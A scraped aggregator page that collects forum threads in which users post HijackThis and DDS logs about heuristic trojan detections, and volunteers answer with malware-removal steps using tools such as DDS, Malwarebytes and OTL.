Tech Problem Aggregator

Gen:Trojan.Heur.ImKfz03..

Q: Gen:Trojan.Heur.ImKfz03..

I have a virus thats being detected & blocked by Bitdefender but i keeps on coming. Its only coming when i am connected to Internet.Here is my HijackThis LogLogfile of Trend Micro HijackThis v2.0.2Scan saved at 12:08:00 AM, on 12/25/2009Platform: Windows Vista SP1 (WinNT 6.00.1905)MSIE: Internet Explorer v8.00 (8.00.6001.18865)Boot mode: NormalRunning processes:C:\Windows\system32\taskeng.exeC:\Program Files\BitDefender\BitDefender 2010\bdagent.exeC:\Windows\system32\Dwm.exeC:\Program Files\Dell\DellDock\DellDock.exeC:\Program Files\PC Connectivity Solution\Transports\NclMSBTSrv.exeC:\Program Files\BitDefender\BitDefender 2010\seccenter.exeC:\Program Files\Dell\QuickSet\quickset.exeC:\Program Files\Synaptics\SynTP\SynTPEnh.exeC:\Program Files\Java\jre6\bin\jusched.exeC:\Program Files\Dell Webcam\Dell Webcam Central\WebcamDell2.exeC:\Program Files\Sensible Vision\Fast Access\FATrayMon.exeC:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exeC:\Program Files\Microsoft Office\Office12\GrooveMonitor.exeC:\Program Files\USB Disk Security\USBGuard.exeC:\Program Files\Windows Sidebar\sidebar.exeC:\Program Files\Windows Media Player\wmpnscfg.exeC:\Program Files\Nokia\Nokia PC Suite 7\PCSuite.exeC:\Windows\ehome\ehtray.exeC:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exeC:\Program Files\Sensible Vision\Fast Access\FATrayAlert.exeC:\Windows\system32\wbem\unsecapp.exeC:\Windows\ehome\ehmsas.exeC:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exeC:\Program Files\Windows Sidebar\sidebar.exeC:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exeC:\Program Files\Synaptics\SynTP\SynTPHelper.exeC:\Program Files\Mozilla Firefox\firefox.exeC:\Windows\explorer.exeC:\Windows\system32\SearchFilterHost.exeC:\Program Files\Trend Micro\HijackThis\HijackThis.exeR1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896R0" target="_blank" class="invilink">http://go.microsoft.com/fwlink/?LinkId=54896R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blankR1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localR0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = O1 - Hosts: ::1 localhostO2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dllO2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dllO2 - BHO: FAIESSO Helper Object - {A2F122DA-055F-4df7-8F24-7354DBDBA85B} - C:\Program Files\Sensible Vision\Fast Access\FAIESSO.dllO2 - BHO: Java™ Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dllO3 - Toolbar: BitDefender Toolbar - {381FFDE8-2394-4f90-B10D-FC6124A40F8C} - C:\Program Files\BitDefender\BitDefender 2010\IEToolbar.dllO4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hideO4 - HKLM\..\Run: [QuickSet] C:\Program Files\Dell\QuickSet\QuickSet.exeO4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exeO4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"O4 - HKLM\..\Run: [Dell Webcam Central] "C:\Program Files\Dell Webcam\Dell Webcam Central\WebcamDell2.exe" /mode2O4 - HKLM\..\Run: [FATrayAlert] C:\Program Files\Sensible Vision\Fast Access\FATrayMon.exeO4 - HKLM\..\Run: [PDVDDXSrv] "C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe"O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"O4 - HKLM\..\Run: [BitDefender Antiphishing Helper] "C:\Program Files\BitDefender\BitDefender 2010\IEShow.exe"O4 - HKLM\..\Run: [BDAgent] "C:\Program Files\BitDefender\BitDefender 2010\bdagent.exe"O4 - HKLM\..\Run: [StartCCC] "C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRunO4 - HKLM\..\Run: [USB Antivirus] C:\Program Files\USB Disk Security\USBGuard.exeO4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"O4 - HKLM\..\Run: [PWRISOVM.EXE] C:\Program Files\PowerISO\PWRISOVM.EXEO4 - HKLM\..\Run: [UnlockerAssistant] "C:\Program Files\Unlocker\UnlockerAssistant.exe"O4 - HKLM\..\Run: [TrojanScanner] C:\Program Files\Trojan Remover\Trjscan.exe /bootO4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRunO4 - HKCU\..\Run: [Google Update] "C:\Users\Nikhil Gupta\AppData\Local\Google\Update\GoogleUpdate.exe" /cO4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exeO4 - HKCU\..\Run: [PC Suite Tray] "C:\Program Files\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytrayO4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exeO4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')O4 - Startup: Dell Dock.lnk = C:\Program Files\Dell\DellDock\DellDock.exeO4 - Startup: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXEO4 - Global Startup: Bluetooth.lnk = ?O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office12\EXCEL.EXE/3000O8 - Extra context menu item: Send image to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htmO8 - Extra context menu item: Send page to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htmO9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dllO9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dllO9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLLO9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htmO9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htmO13 - Gopher Prefix: O17 - HKLM\System\CCS\Services\Tcpip\..\{8878BA5D-3BDD-414F-B71D-7FF1AEEC843A}: NameServer = 218.248.255.194 218.248.255.162O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dllO20 - Winlogon Notify: FastAccess - C:\Program Files\Sensible Vision\Fast Access\FALogNot.dllO23 - Service: BitDefender Arrakis Server (Arrakis3) - BitDefender S.R.L. http://www.bitdefender.com - C:\Program Files\Common Files\BitDefender\BitDefender Arrakis Server\bin\arrakis3.exeO23 - Service: Ati External Event Utility - ATI Technologies Inc. - C:\Windows\system32\Ati2evxx.exeO23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exeO23 - Service: Dock Login Service (DockLoginService) - Stardock Corporation - C:\Program Files\Dell\DellDock\DockLogin.exeO23 - Service: FAService - Sensible Vision - C:\Program Files\Sensible Vision\Fast Access\FAService.exeO23 - Service: BitDefender Desktop Update Service (LIVESRV) - BitDefender S.R.L. - C:\Program Files\Common Files\BitDefender\BitDefender Update Service\livesrv.exeO23 - Service: ServiceLayer - Nokia. - C:\Program Files\PC Connectivity Solution\ServiceLayer.exeO23 - Service: TeamViewer 4 (TeamViewer4) - TeamViewer GmbH - C:\Program Files\TeamViewer\Version4\TeamViewer_Service.exeO23 - Service: BitDefender Virus Shield (VSSERV) - BitDefender S.R.L. - C:\Program Files\BitDefender\BitDefender 2010\vsserv.exe--End of file - 8472 bytesplz help....

A: Gen:Trojan.Heur.ImKfz03..

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Follow the instructions that pop up for posting the results.Close the program window, and delete the program from your desktop.Please note: You may have to disable any script protection running if the scan fails to run. After downloading the tool, disconnect from the internet and disable all antivirus protection. Run the scan, enable your A/V and reconnect to the internet. Also, please subscribe to this topic, so you are notified when someone replies. Please continue to check manually on occasion, as every now and then the email may be caught by your spam filter.To enable topic notifications you should do the following:Click on the My Controls link at the top of the page to enter your control panel.Scroll down to the Options category in the left hand side menu bar and click on the Email Settings link.Put a checkmark in the checkbox labeled Enable 'Email Notification' by default?.Set the If ticked, choose default type: menu option to Immediate Email Notification to have an email sent immediately when someone replied.Information on A/V control HERE

2 more replies
Answer Match 55.44%

I keep getting a popup from Kaspersky with a Trojan quarantine in
C:\Users\Counter\AppData\Local\Google\Desktop\Install\{8976561d-a35d-8b9e-33b1-ec150b61a5be}\â¤â‰¸â‹™\Ⱒ☠â¨\‮ﯹ๛\{8976561d-a35d-8b9e-33b1-ec150b61a5be}\U\[email protected]
 
This just started all of a sudden, I have ran a virus scan with Kaspersky and Mailware bytes and both come up empty. When i try to delete that directory or uninstall Google Desktop it will not let me. I get the popup warning every few minuets. I am running Windows 7.
 

A:detected: Trojan program 'HEUR:Trojan.Win32.Generic' (modification)?

Looks like it may be being protected in it's location.. We need a deeper look. Please follow this Preparation Guide and post in a new topic.Let me know if all went well.

1 more replies
Answer Match 55.02%

Hi guys,
 
I'm way in over my head here. I accidentally unleashed some foul demon on my computer. By being an idiot most likely. I can't reenable my firewall and f-secure keeps finding new vira with the names indicated in the title. Is anyone able to help me out? Anything would be immensely appreciated.
 
Best wishes,
Ragian
 
dds
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 10.0.9200.16720  BrowserJavaVersion: 10.45.2
Run by Rasmus at 13:39:51 on 2013-11-17
.
============== Running Processes ================
.
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\F-Secure\Anti-Virus\fsgk32st.exe
C:\Program Files (x86)\F-Secure\Anti-Virus\FSGK32.EXE
C:\Program Files (x86)\F-Secure\Common\FSMA32.EXE
C:\Program Files (x86)\F-Secure\Common\FSHDLL32.EXE
C:\Program Files (x86)\HTC\HTC Sync Manager\HSMServiceEntry.exe
C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
C:\ProgramData\Skype\Toolbars\Skype C2C Service\c2c_service.exe
C:\Program Files (x86)\F-Secure\ORSP Client\fsorsp.exe
C:\Program Files (x86)\F-Secure\Common\FNRB32.EXE
C:\Program Files (x86)\F-Secure\Common\FIH32.EXE
C:\Program Files (x86)\F-Secure\Anti-Virus\fssm32.exe
C:\Program Files (x86)\F-Secure\Anti-Virus\fsav32.exe
C:\Program Files (x86)\HTC\HTC Sync Manager\HTC Sync\adb.exe
C:\Program Files (x86)\Lenovo\YouCam\YCMMirage.exe
C:\Program Files (x86)\Outlook on the Desktop\OutlookDesktop.exe
C:\Users\Rasmus\AppData\Roaming\Spotify\... Read more

A:heur.trojan.sirefef & trojan.generic.9819927

Hello Ragian I would like to welcome you to the Malware Removal section of the forum.Around here they call me Gringo and I will be glad to help you with your malware problems.Very Important --> Please read this post completely, I have spent my time to put together somethings for you to keep in mind while I am helping you to make things go easier, faster and smoother for both of us!Please do not run any tools unless instructed to do so.We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.Please do not attach logs or use code boxes, just copy and paste the text.Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.Please read every post completely before doing anything.Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.Please provide feedback about your experience as we go.A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", ... Read more

22 more replies
Answer Match 55.02%

I bought Kasperky just last week and I have a trojan that keep installing itself over and over. Everytime I do any scan it is always back after being deleted.

Hope someone can help. Here is my HJT Log.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 3:45:56 PM, on 12/7/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16735)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
c:\program files\common
files\logitech\lvmvfm\LVPrcSrv.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Kaspersky Lab\Kaspersky
Anti-Virus 2009\avp.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Windows
Live\Messenger\msnmsgr.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program
Files\Google\GoogleToolbarNotifier\GoogleToolba
rNotifier.exe
C:\Program Files\Microsoft
ActiveSync\wcescomm.exe
C:\PROGRA~1\MICROS~3\rapimgr.exe
C:\Program Files\Lavasoft\Ad-Aware
2007\aawservice.exe
C:\Program Files\Kaspersky Lab\Kaspersky
Anti-Virus 2009\avp.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common
Files\InterVideo\RegMgr\iviRegMgr.exe
C:\Program Files\Common Files\Microsoft
Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\Comm... Read more

A:Trojan Kaspersky can't get rid of. HEUR:Trojan.Win32.Generic

6 more replies
Answer Match 53.76%

constantly popping up....IE/Firefox keeps wanting to close.....i tried to manually remove no luck...thanks for your assistance....much appreciated....im thinking of reformatting anyway but would like to resolve the issue first....recently downloaded eMule not sure where these viruses came so if i could find out how to keep from reinstalling them after a format that would be nice....dell dimension 8300 WinXP ZoneAlarm(but would like another)lol

A:Trojan.vundo.GGI and Trojan.Heur.564E44

Hi and welcome to BleepingComputer The process of cleaning your computer may require temporarily disabliling some security programs. If you are using SpyBot Search and Destroy, please refer to Note 2 at the bottom of this page.Please download Malwarebytes Anti-Malware and save it to your desktop.alternate download link 1alternate download link 2Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself.Press the OK button to close that box and continue.If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install.On the Scanner tab:Make sure the "Perform Quick Scan" option is selected.Then click on the Scan button.If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button. The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Result... Read more

6 more replies
Answer Match 52.92%

Just really sharing some info.

I recently had the Heur Trojan come up on my laptop, as the Trend Micro platinum anti virus program did not pick it up. I had scanned my system on several occasions.

Having recently changed broadband supplier, I changed to a different AV program and it picked up the trojan straightaway. I then had real problems getting the laptop and internet to function.

Tried to recover to previous restore dates - no good. The trojan basically stops you attempting to get rid of it.

Then tried to use my new AV program in safe mode. No expert on using safe mode, but if you hold down the on/off button down on your PC/Laptop for about 8 seconds it turns your system of and on pushing the on button, it allows you to use the safe mode. In safe mode, you then log on in a safer environment. You then use the AV progam that you have (hopefully a decent one) and it should on scanning find all the trojan files so that they are deleted. When you then log on normally, your system should be back to normal. But do run your AV program scan again to check.

Since I have done this, no problems. (fingers crossed)

A:Heur Trojan

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you are unable to create a log because your computer cannot start up successfully please provide detailed information about the Windows version you are using: What we in particular need to know is version, edition and if it is a 32bit or a 64bit system. [/b]If you are unsure about any of these caracteristics, just let us know and we'll help you figuring it out. Please also tell us if you have your Windows CD/DVD handy.Please include a clear description of the problems you're having, along with any steps you may have performed so far.Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.Even if you have already provided information about y... Read more

2 more replies
Answer Match 52.92%

I have bitdefender and it detected the following virus but states that it can not remove it. Not usre if this is why my computer has been running so slow.
Gen:Trojan.Heur.1038C74242

Can anyone tell me how to remove it

A:Gen: Trojan.heur

Hello and welcome to TSF.

We want all our members to perform the steps outlined in the link given below, before posting for assistance. There's a sticky at the top of this forum, and a
Quote:




Having problems with spyware and pop-ups? First Steps




link at the top of each page.

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

1 more replies
Answer Match 52.92%

I have ran several different scan to try to rid my computer of this. I was another trojan, but I believe that one is gone..but still have this one. Ran kaspersky antivirus, malwarebytes, and also spybot. Will not go away. Anyone able to help me here.

A:Heur:Trojan

Does this concern the same computer as the topic here? http://www.bleepingcomputer.com/forums/topic434738.html

3 more replies
Answer Match 52.92%

So it took me 4 different antivirus programs to find ANYTHING wrong with my computer. BitDefender found "Trojan.heur" and I know there is something else wrong with this machine. Everytime i click on a website from a search result (google, yahoo, everything) it takes me to a random website. I cannot access the Microsoft Update website, and I cannot update any Antivirus program i have. Any help would be awesome!Here is my hijack this log:Logfile of Trend Micro HijackThis v2.0.2Scan saved at 4:37:36 PM, on 8/17/2009Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v7.00 (7.00.6000.16827)Boot mode: NormalRunning processes:C:WINDOWSSystem32smss.exeC:WINDOWSsystem32winlogon.exeC:WINDOWSsystem32services.exeC:WINDOWSsystem32lsass.exeC:WINDOWSsystem32svchost.exeC:WINDOWSSystem32svchost.exeC:Program FilesIntelWirelessBinEvtEng.exeC:WINDOWSExplorer.EXEC:Program FilesIntelWirelessBinS24EvMon.exeC:WINDOWSsystem32spoolsv.exeC:Program FilesCommon FilesAppleMobile Device SupportbinAppleMobileDeviceService.exeC:Program FilesAskBarDisbarbinAskService.exeC:Program FilesAskBarDisbarbinASKUpgrade.exeC:Program FilesBonjourmDNSResponder.exeC:Program FilesTOSHIBAConfigFreeCFSvcs.exeC:WINDOWSsystem32DVDRAMSV.exeC:WINDOWSeHomeehRecvr.exeC:WINDOWSeHomeehSched.exeC:Program FilesJavajre6binjqs.exeC:Program FilesCommon FilesBitDefenderBitDefender Update Servicelivesrv.exeC:WINDOWSehomeehtray.exeC:WINDOWSRTHDCPL.EXEC:WINDOWSAGRSMMSG.exeC:Program FilesTOSHIBAConfigFreeNDSTray.e... Read more

A:trojan.heur and something else.

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

2 more replies
Answer Match 52.92%

Recently I was infected with the Virtumonde trojan, and I've dealt with it a few times so I knew how to remove it. I did successfully remove it (I think.. nothing is picking it up), but now I'm seeing something I've never seen before. AVG pops up alot saying it's HEUR. What do I do?
DDS (Ver_09-02-01.01) - NTFSx86
Run by Rob at 17:49:12.14 on Mon 03/02/2009
Internet Explorer: 7.0.5730.13 BrowserJavaVersion: 1.6.0_11
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1022.233 [GMT -5:00]

AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated)

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
C:\WINDOWS\system32\svchost -k rpcss
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\Program Files\DigitalPersona\Bin\DPWinLct.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\Program Files\Belkin\Belkin Wireless Network Utility\WLService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program F... Read more

A:Heur trojan?

Hello Riddlerrob,I'm afraid I have bad news for you I see you're dealing with Virut on top of the other nasty malware on your system. In that case, it's unfortunately a lost cause - Game over situation and a format and reinstall is the fastest and especially the safest solution.You may want to read this why:Virut and other File infectors - Throwing in the Towel? So, I suggest you to start backup all of your valuable data/documents/pictures/movies/songs/etc.. Do NOT backup any applications/installers and Do NOT backup any .exe/.scr/.htm/.html/.xml/.zip/.rar files...This because these files may be infected as well. If you back them up and replace them afterwards, it will infect your computer again.Read here for instructions how to format and reinstall Windows: http://web.mit.edu/ist/products/winxp/adva...all-format.htmlGreetings,Thunder

1 more replies
Answer Match 52.92%

when I click on the user icon I get a blank screen and the virus warning Trojan.heur.GZ infection and I cannot get on the internet but if I unplug modem and reboot I can get click on guest icon and get on the internet. please help
 

A:trojan.Heur.GZ

Hello danpfander,

Welcome to TSG.

See if you can follow these instructions.

You may have used Malwarebytes before. If you have, and still have it on your machine, please update and run. Post the scan report back here.

If you do not have Malwarebytes please download from Here

Double Click mbam-setup.exe to install the application.
Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
If an update is found, it will download and install the latest version.
Once the program has loaded, select "Perform Quick Scan", then click Scan.
The scan may take some time to finish,so please be patient.
When the scan is complete, click OK, then Show Results to view the results.
Make sure that everything is checked, and click Remove Selected.
When disinfection is completed, a log will open in Notepad and you may be prompted to Restart.(See Extra Note)
The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.
Copy&Paste the entire report in your next reply.
Extra Note:
If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts,click OK to either and let MBAM proceed with the disinfection process,if asked to restart the computer,please do so immediatly.

Next
Download OTL to your Desktop

Double click on the icon to run it. Make sure all other windows are closed and to let it run uninterrupted.
Under the Custom Scan bo... Read more

1 more replies
Answer Match 52.92%

been having programs with my computer recently
used bitdefedner 2009 to perform a deep full scan and got the following results:

Gen Trojan Heur 25

C:\Program Files\HP\Quickplay\QPService.exe (memory dump)
C:\Program Files\Bitdef....Bitdefender2009\seccenter.exe (memory dump)
C:\Program Files\HP\Quickplay\Kernal\TV\CLCapSvc.exe (memory dump)
C:\Program Files\Common Files\LightScribe\LSSrvc.exe (memory dump)
C:\Program Files\HP\Quickplay\Kernal\TV\CLSched.exe (memory dump)
C:\Program Files\Windows Media Player\WMPNSCFG.exe (memory dump)
C:\Program Files\Windows Media Player\wmpnetwk.exe (memory dump)
C:\windows\system32\notepad.exe (memory dump)

i hope somebody can point in in the right direction, just got a new HD put into my pc. Thank you

A:Gen Trojan Heur 25

Hello and Welcome to TSF.

We want all our members to perform the steps outlined in the link I'll give you below, before posting for assistance. There's a sticky at the top of this forum, and a
Quote:




Having problems with spyware and pop-ups? First Steps




link at the top of each page.

------------------------------------------------------

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through allthe steps, you shall have a proper set of logs. Please post them in a new thread, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Please note that the Virus/Trojan/Spyware Help forum is extremely busy, and it may take a while to receive a reply.

------------------------------------------------------

1 more replies
Answer Match 52.92%

I have the following virus on my hard drive and cannot get rid of it:
CRF2F54.TMP
Location: C\Documents and Settings\Snowy's\Local Settings\Temp\CRF2F54.TMP
Virus Name: [email protected]
Message on pop-up screen: Fatal Error 1001 and 1022

A:Trojan.heur

Hi Leonie, Soory to hear about the virus, they are a real pain these days and can be very problematic. I know you are using Windows XP but our posting rules for viruses are as follows.

Please follow our pre-posting process outlined here:
http://www.techsupportforum.com/secu...oval-help.html

After running through all the steps, please post the requested logs in the Virus/Trojan/Spyware Help forum, not here.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Please note that the Virus/Trojan/Spyware Help forum is extremely busy, and it may take a while to receive a reply.

If you don't post the required logs, it will slow them down with getting any help.

The techs that voluteer in that section are very experienced at helping people to fix computers with a virus. It's not that I wouldn't be glad to help you it's just that those guys will be better able to help then me.

I will continue to monitor you to make sure that you get the help you need. Please mark this thread solved using the thread tools option located at the top of this thread and selecting solved from the drop down menu and then post at the link above as it against the rules to have more than one thread open at a time.


Thank you
Patmark

3 more replies
Answer Match 52.92%

I have been trying to be very cognizant and disciplined at maintaining my security "stuff" since I got hacked back in October. I run PC Shield (aka BitDefender) as my resident, full antivirus package. Every few days, I run MalwareBytes. Every week I run Cureit.

Yesterday, PC Shield supposedly caught and blocked a Trojan - Gen:Trojan.Heur..... I thought it handled it appropriately, but when I got up this morning, the scheduled scan had picked up over 1800 files that were infected with this Gen:Trojan.Heur (with additional extensions of odd characters after .Heur.". I went through all files and quarantined or deleted using PC Shield. Ran it again and is came up with no issues. I then tried to run Dr.Web Cureit in Safe Mode, but as happens frequently, it died and rebooted about 20 minutes into the scan. So, I ran Malwarebytes in normal mode and it showed no issues. Then, I ran SUPERAntiSpyware in Safe Mode. It came up with 2 instances of Trojan.Agent/Gen-Dropper[Temp]. I had it quarantine both issues. Now PC Shield shows clean again.

Is there anyway I can be assured that I'm not still infected? If I ever find one of these guys that put this crap out there, I'll personally waterboard them!

Thanks.

Tom

A:Trojan.Heur.*****@***

ps. I just ran ESET Online and it came up clean. I ran Malware and it came up clean. I ran Sophos Anti-Rootkit and it came up with a boatload of entries, but all were either unable to be removed or not advisable to remove. Do you think I'm trojan free now?

1 more replies
Answer Match 52.92%

I have the following virus on my hard drive and cannot get rid of it:
CRF2F54.TMP
Location: C\Documents and Settings\Snowy's\Local Settings\Temp\CRF2F54.TMP
